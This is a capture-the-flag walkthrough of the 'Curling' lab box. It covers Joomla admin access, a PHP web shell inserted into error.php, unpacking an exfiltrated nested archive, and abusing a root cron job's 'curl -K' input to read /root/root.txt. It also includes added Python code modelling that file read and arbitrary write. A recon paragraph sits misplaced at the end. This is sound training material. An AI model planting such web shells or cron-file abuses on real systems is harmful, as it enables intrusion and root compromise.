
Curling

Easy - Linux

Recon

# Nmap 7.92 scan initiated Thu Dec 22 23:44:41 2022 as: nmap -p22,80 -sC -sV -oN /home/ventus/htb/labs/Curling/nmap.txt 10.10.10.150
Nmap scan report for 10.10.10.150
Host is up (0.12s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 8a:d1:69:b4:90:20:3e:a7:b6:54:01:eb:68:30:3a:ca (RSA)
|   256 9f:0b:c2:b2:0b:ad:8f:a1:4e:0b:f6:33:79:ef:fb:43 (ECDSA)
|_  256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-title: Home
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 22 23:44:55 2022 -- 1 IP address (1 host up) scanned in 14.16 seconds

Getting RCE & Lateral Movement

Viewing the home page source, there is an HTML comment with the content secret.txt. Navigating to that path gives us a password, and logging into the Joomla administrator panel as floris gives us a Super User account, but no SSH yet. Let's get RCE first. Inserting a simple system($_GET["cmd"]) into the active template's error.php gave us command execution as www-data. That's a start.

Let's try to view floris' home directory. password_backup is readable and looks like a hexdump of something. I'll exfiltrate it to my attacking machine, run xxd -r to revert it to its original form, and run file to identify what it is. It's a bzip2-compressed archive, so let's run bunzip2. Another archive. It turned out to be several nested archive formats, but we finally get a password.txt, which we can use to log in as floris over SSH.
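The hexdump reversal and archive peeling above, written out as an added example in Python's standard library (this is not the author's code, and the real password_backup is not reproduced). It goes a little beyond the page: the peeler recognises the containers file would report for this kind of blob (bzip2, gzip, zip, tar) rather than only bzip2, and bounds the loop so a hostile blob cannot nest forever. The sample blob is constructed inline, and its layer order (bzip2 -> zip -> gzip -> tar) is an assumption for the demo, not the box's actual order.

```python
"""Reverse an xxd hexdump and peel nested archives by magic bytes.

Added example for this writeup (not the author's code). The sample blob is
constructed below with the standard library so everything runs offline; the
layer order bzip2 -> zip -> gzip -> tar is an assumption for the demo, not
the box's actual password_backup.
"""
import bz2
import gzip
import io
import re
import tarfile
import zipfile

# One xxd line: "00000000: 425a 6839 3141 ...  BZh91A..." - offset, hex column, ASCII column.
_HEX_LINE = re.compile(r"^[0-9a-fA-F]+:\s+((?:[0-9a-fA-F]{2} ?)+)")


def to_xxd(data):
    """Render bytes in xxd's default layout (16 bytes per line, grouped in pairs)."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        pairs = [chunk[i:i + 2].hex() for i in range(0, len(chunk), 2)]
        ascii_col = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {' '.join(pairs):<39}  {ascii_col}")
    return "\n".join(lines) + "\n"


def from_xxd(dump):
    """What `xxd -r` does: keep the hex column of each line, drop offsets and the ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        m = _HEX_LINE.match(line)
        if m:  # lines that are not hexdump lines are skipped, as xxd -r skips them
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def peel_one(data):
    """Identify one layer by its magic bytes (what `file` reports) and return (kind, inner)."""
    if data.startswith(b"BZh"):
        return "bzip2", bz2.decompress(data)
    if data.startswith(b"\x1f\x8b"):
        return "gzip", gzip.decompress(data)
    if data.startswith(b"PK\x03\x04"):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            name = zf.namelist()[0]  # one member is enough for this demo
            return f"zip:{name}", zf.read(name)
    if len(data) > 262 and data[257:262] == b"ustar":  # ustar/POSIX tar magic
        with tarfile.open(fileobj=io.BytesIO(data)) as tf:
            member = next(m for m in tf.getmembers() if m.isfile())
            return f"tar:{member.name}", tf.extractfile(member).read()
    return None, data


def unwrap(data, max_layers=16):
    """Peel layers until the data is no longer a known container. Returns (layers, payload)."""
    layers = []
    for _ in range(max_layers):  # bounded: a hostile blob could otherwise nest forever
        kind, inner = peel_one(data)
        if kind is None:
            break
        layers.append(kind)
        data = inner
    return layers, data


def build_sample(secret=b"constructed-demo-password\n"):
    """Constructed sample: bzip2(zip(gzip(tar(password.txt)))), returned as an xxd dump."""
    tar_buf = io.BytesIO()
    with tarfile.open(fileobj=tar_buf, mode="w") as tf:
        info = tarfile.TarInfo("password.txt")
        info.size = len(secret)
        tf.addfile(info, io.BytesIO(secret))
    gz = gzip.compress(tar_buf.getvalue())
    zip_buf = io.BytesIO()
    with zipfile.ZipFile(zip_buf, "w") as zf:
        zf.writestr("password.gz", gz)
    return to_xxd(bz2.compress(zip_buf.getvalue()))


if __name__ == "__main__":
    found, payload = unwrap(from_xxd(build_sample()))
    print("layers:", " -> ".join(found))
    print("payload:", payload.decode())
```

On a real blob, replace build_sample() with the contents of the exfiltrated file and check the final payload with file: if unwrap stops early, the next layer is a container this peeler does not know, not the end of the chain.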

Privilege Escalation

In floris' home directory there is an interesting subdirectory named admin-area with two files, input and report. The contents of input were odd, but correlated with the contents of report:

input
url = 'http://127.0.0.1'
report
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <meta charset="utf-8" />
        <base href="http://127.0.0.1/" />
        <meta name="description" content="best curling site on the planet!" />
        <meta name="generator" content="Joomla! - Open Source Content Management" />
        <title>Home</title>
        <link href="/index.php?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
        ...

To learn more about the situation, I ran pspy to watch for cron jobs running periodically.

2022/12/23 06:34:01 CMD: UID=0    PID=14413  | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report 
2022/12/23 06:34:01 CMD: UID=0    PID=14412  | sleep 1 
2022/12/23 06:34:01 CMD: UID=0    PID=14411  | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input 
2022/12/23 06:34:01 CMD: UID=0    PID=14410  | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report

There was indeed a root cron job calling curl with the -K flag pointing at the input file and writing the result to report. The curl man page shows that -K/--config makes curl read its arguments from a file, one option per line, and any long option name is valid there, including output, so a job like this also hands the owner of input a write wherever root can write. I first thought we might be able to insert a malicious argument, but then remembered to keep it simple. Note from the pspy output that a second job resets input from /root/default.txt a second after each run, so the edited file has to be in place before the next run fires. Let's just point url at the root flag instead:

input
url = "file:///root/root.txt"

Sure enough, the root flag appeared in report. Another one done!
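A small model of what the cron job's curl -K will do with a config file the low-privileged user controls, as an added example for this writeup (not the author's code, and not curl itself). It implements enough of curl's config-file syntax (option names with or without leading dashes; =, : or whitespace as separator; # comments; double-quoted values with backslash escapes; unquoted values ending at whitespace) to act on the two directives that matter here, url and output, and only for file:// URLs, so it runs offline. It demonstrates both the read used above and the write the output directive adds. Curl's pairing of several urls with several outputs, and every other directive, are not modelled; the demo paths are constructed temporary files standing in for /root/root.txt and a root-writable target.

```python
"""Model of what `curl -K <file>` does with a config file an attacker controls.

Added example for this writeup: not the author's code and not curl itself. It
implements enough of curl's config-file syntax to act on `url` and `output`
for file:// URLs only, so it runs offline. Pairing rules for several urls and
outputs and every other directive are curl's business and are not modelled.
"""
import os
import re
import tempfile
from urllib.parse import unquote, urlparse

# name, optional separator (=, : or whitespace), value
_DIRECTIVE = re.compile(r"^(?P<name>-{0,2}[A-Za-z][\w.-]*)(?:\s*[=:]\s*|\s+)?(?P<value>.*)$")
_ESCAPES = {"\\": "\\", '"': '"', "t": "\t", "n": "\n", "r": "\r", "v": "\v"}


def _unquote_value(value):
    """Strip curl-style double quotes and resolve backslash escapes inside them."""
    out, i = [], 1
    while i < len(value) and value[i] != '"':
        if value[i] == "\\" and i + 1 < len(value):
            i += 1
            out.append(_ESCAPES.get(value[i], value[i]))
        else:
            out.append(value[i])
        i += 1
    return "".join(out)


def parse_curl_config(text):
    """Return (option, value) pairs in file order, the way curl reads a -K file."""
    opts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue  # blank lines and comments
        m = _DIRECTIVE.match(line)
        if not m:
            raise ValueError(f"unparseable config line: {raw!r}")
        name = m.group("name").lstrip("-")  # `url`, `--url` and `-o`-style names all work
        value = m.group("value").strip()
        if value.startswith('"'):
            value = _unquote_value(value)
        elif value:
            value = value.split()[0]  # unquoted values stop at the first whitespace
        opts.append((name, value))
    return opts


def simulate_root_curl(config_text, cli_output=None):
    """Act as `curl -K <config> -o <cli_output>` would for a file:// url.

    Returns the fetched bytes; if the config names an `output`, the bytes are
    also written there, with the privileges of whoever runs curl (root, on the box).
    """
    opts = parse_curl_config(config_text)
    url = next((v for k, v in opts if k == "url"), None)
    output = next((v for k, v in opts if k in ("output", "o")), cli_output)
    if url is None:
        raise ValueError("config has no url directive")
    parsed = urlparse(url)
    if parsed.scheme != "file":
        raise NotImplementedError("only file:// URLs are modelled here")
    with open(unquote(parsed.path), "rb") as fh:
        data = fh.read()
    if output is not None:
        with open(output, "wb") as fh:
            fh.write(data)
    return data


def demo():
    """Constructed demo: read a 'root-only' file and land a copy at an attacker-chosen path."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "root.txt")          # stands in for /root/root.txt
        with open(secret, "wb") as fh:
            fh.write(b"constructed-demo-flag\n")
        landing = os.path.join(tmp, "attacker_chosen")  # stands in for any root-writable path
        cfg = (
            "# attacker-controlled /home/floris/admin-area/input\n"
            f'url = "file://{secret}"\n'
            f'output = "{landing}"\n'
        )
        fetched = simulate_root_curl(cfg, cli_output=os.path.join(tmp, "report"))
        with open(landing, "rb") as fh:
            return fetched, fh.read()


if __name__ == "__main__":
    print(demo())
```

The defensive reading is the same as the offensive one: a root cron job must not take a -K file, or any other argument file, from a path a non-root user can write.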


Browsing to the web service, we can see it is a Joomla instance. Enumerating the version, I couldn't find any particular exploits that worked, so moving on. We can see a few posts on the home page, although one is signed by Floris.